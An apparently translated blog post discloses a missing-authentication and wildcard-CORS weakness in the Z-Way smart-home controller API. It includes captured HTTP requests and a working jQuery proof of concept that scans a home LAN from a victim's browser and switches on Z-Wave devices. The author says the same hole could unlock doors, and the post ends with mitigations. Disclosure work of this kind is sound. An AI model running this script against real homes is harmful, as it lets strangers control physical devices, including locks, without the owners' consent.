How to hack smart home under Z-Way control

How to hack smart home under Z-Way control

Z-Wave is a new smart home technology that uses the Z-Way communication protocol. This wireless networking specification is very mature in Europe and America. Recently I bought a RaZberry board and started my research on smart furniture.

What is Z-Way

I chose the RaZberry board instead of the traditional Z-Wave controller, mainly because it has compatibility with Raspberry Pi, it allows me to access the Z-Wave protocol and universal input/output (GPIO) devices through programming, which is very helpful for studying the alarm sensors in my house. By the Way, Z-Way extracts the features of Z-Wave to design the REST (Representational State Transfer) API, making it easier to use. The Z-Way project even has a basic web interface, including the gateway management interface.

Test process

After installing software for the RaZberry board and connecting some devices, I began to observe the web Request packages generated when managing the devices. Z-Way uses Angular JS framework to develop an API for access from web and Android apps.

The following is a request to turn on the light:

POST http://192.168.5.219:8083/ZWaveAPI/Run/devices[12].instances[0].commandClasses[37].Set(255) HTTP/1.1Host: 192.168.5.219:8083Connection: keep-aliveContent-Length: 0Accept: application/json, text/plain, */*Origin: http://192.168.5.219:8083User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36Referer: http://192.168.5.219:8083/expert/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.8

The following is the response package:

HTTP/1.1 200 OKContent-Type: application/jsonConnection: keep-aliveAccess-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueContent-Length: 4 null

But now, I found a serious problem. Angular APIs do not need to be authenticated. I found this on the official website and found that a user raised the following question (FAQ ):

Q: Have HTTP/JSON APIs been authenticated by HTTP? A: Of course not. Your Intranet is assumed to be absolutely secure by the manufacturer. It is protected by a third-party firewall and password without external intrusion. If you want to use a password to protect the Z-Way, you can use ngnix or other reverse proxy servers for additional settings.

 

It seems that the vendor has already discovered this problem, but it has not personally solved it. However, in the past, most of the hardware used were technical geeks, with a minority of common users. However, the monks still feel that there is a potential crisis, because after all, it brings unknown fear to users. The user's Lan may be relatively secure, but this does not mean that remote attacks are impossible. I began to think about how to attack API interfaces outside the LAN. Suddenly, I remembered the response packet above. Note: The default CORS (cross-origin Resource Sharing) header of the Z-Way web server allows any Origin source. It will respond to an Access-Control-Allow-origin :*, that is, allow all origin sources, which will obviously lead to cross-origin attacks.

The following POC will show you how hackers can use malicious JS Code to scan Intranet hosts to perform Z-Wave operations. Because these requests are asynchronous, the victim is not aware of what is happening.

jQuery(document).ready(function(){  for(var i=1; i<=254; i++)  {    var host = "192.168.5." + i;    var url = "http://" + host + ":8083/ZWaveAPI/Run/devices[99].instances[0].commandClasses[37].Set(255)";    $.ajax({      type: "POST",      url: url,      host: host    })    .always(function(r)    {      if(r.status != 0)      {        var valid_host = this.host;        // Server found, enumerate devices        for(var y=0; y<=15; y++)        {          $.post("http://" + valid_host + ":8083/ZWaveAPI/Run/devices[" + y + "].instances[0].commandClasses[37].Set(255)");        }      }    });  }});

First, the script cyclically attempts the LAN host and sends a POST request to the API. Then, it finds the host with a return status code of not 0 and determines its survival. If the victim's controller device number is less than 99, the script will traverse the device ID number, up to 15, and try to turn on the light. This vulnerability is more reflected in unlocking the door, opening the garage, and processing other sensitive devices.

The following test simulates the scenario where a host is hacked. If the returned response code is 200, it is successful:

Attackers can try to detect more default Intranet segments. If the victim's browser supports WebRTC, attackers can obtain more information. In this case, we can send a STUN request to determine the victim's intranet IP address to estimate the Intranet range.

It is not easy for vendors to pass authentication to enhance the security of Razberry, but it is not difficult for users to do so through other settings. In addition, another improvement that the vendor can make is to specify the allowed origin in the CORS policy, not to reject the visitor. This vulnerability in the Z-Way request package is very interesting. It reveals the risk of free CORS implementation and shows how to attack them.